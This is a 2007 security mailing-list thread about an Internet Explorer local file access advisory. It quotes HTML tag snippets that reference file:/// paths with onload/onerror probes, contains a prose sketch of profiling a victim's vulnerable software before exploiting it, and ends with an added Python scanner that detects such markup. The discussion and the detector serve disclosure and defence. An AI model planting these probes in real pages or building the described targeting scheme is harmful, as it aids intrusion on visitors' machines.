well, the way I'd seen it working when I stumbled across it was that you
could profile a system for known vulnerable programs, and then connect back
and exploit them. e.g.:
client connects to server
server serves blah.html
blah.html launches javascript to detect vulnerable programs
client connects to server telling which vulnerable programs are installed
(connection initiated by JS*)
server connects back to try known exploits against only those programs that
are installed.
yep: the practical application is limited, it does rely on other vulns, it's
not critical. I'm quite amazed MSIE's still vulnerable though (well...)
* hey, do you think if I write a paper called "intelligent exploitation in
the web2.0 age" that anyone will publish it? :D
cheers,
-h.
On 2/20/07, Jordan Wiens <[EMAIL PROTECTED]> wrote:
Umm, so? You can put links to local files in a page. Nothing new
there. If you can somehow access those objects later to disclose local
file contents, violating the same origin policy, well then by gosh
you've got a real vulnerability.
If you can tell whether they exist (à la Howard's follow-up email via
onload errors -- and similar to the intranet scanning mechanisms RSnake
and Jeremiah Grossman have been working on), great, you've got a minor
file disclosure mechanism that might be useful when combined with other
vulns, but it's still a minor vuln at best, hardly "critical".
And on the off chance that was just a clever troll, "d'oh. Got me."
--
Jordan Wiens, CISSP
UF Network Security Engineer
(352)392-2061
Rajesh Sethumadhavan wrote:
> *Microsoft Internet Explorer Local File Accesses Vulnerability*
>
> #####################################################################
>
> XDisclose Advisory : XD100099
> Vulnerability Discovered : February 10th 07
> Advisory Released : February 20th 07
> Credit : Rajesh Sethumadhavan
>
> Class : Local File Accesses
> Severity : Critical
> Solution Status : Unpatched
> Vendor : Microsoft Corporation
> Affected applications : Microsoft Internet Explorer
> Affected version : Microsoft Internet Explorer 6 confirmed
> (Other versions may also be affected)
> Affected Platform : Windows XP Professional SP0,SP1,SP2
> Windows Home Edition SP0,SP1,SP2
> Windows 2003
>
> #####################################################################
>
>
> *Overview:*
> Microsoft Internet Explorer is the default browser bundled with all
> versions of the Microsoft Windows operating system.
>
> *Description:*
> A vulnerability has been identified in Microsoft Internet Explorer
> (default installation) on Windows XP Service Pack 2 which could be
> exploited by malicious users to obtain the victim's local files. This flaw
> is due to an error in the way Microsoft Internet Explorer handles
> different HTML tags, which could be exploited by a malicious remote
> user to obtain sensitive local files from the victim's computer.
>
> *Vulnerability Insight:*
> Microsoft Windows explorer is not handling various HTML tags such as "img",
> "script", "embed", "object", "param", "style", "bgsound", "body" and "input"
> correctly (other tags may also be vulnerable). By using the file protocol along
> with the above tags it is possible to access the victim's local files.
>
> *a)* Embed Tag Local File Access:
> ---------------------------------------------------------------------
> <EMBED SRC="file:///C:/test.pdf" HEIGHT=600 WIDTH=1440></EMBED>
> ---------------------------------------------------------------------
>
> *b)* Object & Param Tag Local File Access:
> ---------------------------------------------------------------------
> <object type="audio/x-mid" data=" file:///C:/test.mid" width="200"
> height="20">
> <param name="src" value="file:///C:/test.mid">
> <param name="autoStart" value="true">
> <param name="autoStart" value="0">
> </object>
> ---------------------------------------------------------------------
>
> *c)* Body Tag Local File Access:
> ---------------------------------------------------------------------
> <body background="file:///C:/test.gif" onload="alert('loading body
> bgrd success')" onerror="alert('loading body bgrd error')">
> ---------------------------------------------------------------------
>
> *d)* Style Tag Local File Access:
> ---------------------------------------------------------------------
> <STYLE type="text/css">BODY{background:url(" file:///C:/test.gif")}
> </STYLE>
> ---------------------------------------------------------------------
>
> *e)* Bgsound Tag Local File Access:
> ---------------------------------------------------------------------
> <bgsound src="file:///C:/test.mid" id="soundeffect" loop=1 autostart=
> "true"/>
> ---------------------------------------------------------------------
>
> *f)* Input Tag Local File Access:
> ---------------------------------------------------------------------
> <form>
> <input type="image" src=" file:///C:/test.gif" onload="alert('loading
> input success')" onerror="alert('loading input error')">
> </form>
> ---------------------------------------------------------------------
>
> *g)* Image Tag Local File Access:
> ---------------------------------------------------------------------
> <img src="file:///C:/test.jpg" onload="alert('loading image success')"
> onerror="alert('loading image error')">
> ---------------------------------------------------------------------
>
> *h)* Script Tag Local File Access:
> ---------------------------------------------------------------------
> <script src="file:///C:/test.js"></script>
> ---------------------------------------------------------------------
>
>
> *Exploitation method:*
> - Create a web page or an HTML mail with the vulnerable code
> - When the victim opens the mail or visits the vulnerable site it is
> possible to access his local files.
>
> *Demonstration:*
> Note: the demonstration will try to access a few default images and wave
> files
>
> - Visit the POC
> - If a vulnerable Internet Explorer is used it will show your local
> sample images and give a proper alert.
>
> *Solution:*
> No solution
>
> *Screenshot:*
> http://www.xdisclose.com/images/xdiscloselocalie.jpg
>
> *Proof Of Concept:*
> http://www.xdisclose.com/poc/xdiscloselocalie.html
>
> *Impact:*
> A remote user can get access to the victim's local system files.
>
> Scope of impact is limited to system level.
>
> *Original Advisory:*
> http://www.xdisclose.com/XD100099.txt
>
> *Credits:*
> Rajesh Sethumadhavan has been credited with the discovery of this
> vulnerability.
>
> *Disclaimer:*
> This entire document is strictly for educational, testing and
> demonstration purposes only. Modification, use and/or publishing of this
> information is entirely at your own risk. The exploit code is to be
> used in your testing environment only. I am not liable for any direct
> or indirect damages caused as a result of using the information or
> demonstrations provided in any part of this advisory.
>
>
>
> Thanks
> Regards
> Rajesh Sethumadhavan
>
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> darklab mailing list
> [email protected]
> http://lists.darklab.org/cgi-bin/mailman/listinfo/darklab
--
This message has been ROT-13 encrypted twice for higher security...
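The pattern the thread argues about is easy to spot on the wire, which is what a mail gateway or proxy cares about. The following is an added example, not code from the advisory or from anyone on the list: it walks untrusted HTML with Python's stdlib parser, reports every place one of the tags the advisory lists (and inline CSS) points at a file: URI, and marks whether an onload/onerror handler is attached, the existence-probe variant Jordan Wiens refers to. The sample markup is constructed here and is not the xdisclose PoC page.

```python
# Added example (not from the thread): flag file:// references in the tags the advisory lists.
import re
from html.parser import HTMLParser

URL_ATTRS = {"src", "data", "background", "value", "href"}
HANDLER_ATTRS = {"onload", "onerror"}
FILE_URI = re.compile(r"^\s*file:", re.IGNORECASE)
CSS_FILE_URL = re.compile(r"url\(\s*['\"]?\s*file:", re.IGNORECASE)


class FileUriScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # (tag, attribute, value, has_probe)
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        self._in_style = tag == "style"
        probe = bool(HANDLER_ATTRS & attrs.keys())  # onload/onerror attached?
        for name, value in attrs.items():
            if name in URL_ATTRS and FILE_URI.match(value):
                self.findings.append((tag, name, value.strip(), probe))
            elif name == "style" and CSS_FILE_URL.search(value):
                self.findings.append((tag, name, value.strip(), probe))

    def handle_endtag(self, tag):
        self._in_style = False

    def handle_data(self, data):
        # Inline sheets such as BODY{background:url("file:///C:/test.gif")}
        if self._in_style and CSS_FILE_URL.search(data):
            self.findings.append(("style", "css", data.strip(), False))


def scan_html(markup):
    """Return every file: reference in untrusted markup, in document order."""
    parser = FileUriScanner()
    parser.feed(markup)
    parser.close()
    return parser.findings


# Constructed sample mirroring the advisory's snippets (not the real PoC page).
SAMPLE = (
    '<body background="file:///C:/test.gif" onload="alert(1)" onerror="alert(2)">'
    '<img src="https://example.test/ok.png"><img src="file:///C:/test.jpg" onerror="alert(3)">'
    '<object data=" file:///C:/test.mid"><param name="src" value="file:///C:/test.mid"></object>'
    '<style type="text/css">BODY{background:url(" file:///C:/test.gif")}</style>'
    '<bgsound src="file:///C:/test.mid" loop="1" autostart="true"/>'
    '<script src="file:///C:/test.js"></script></body>'
)
```

Run `scan_html(SAMPLE)` to see seven findings; only the body background and the second img carry a handler and are therefore flagged as existence probes.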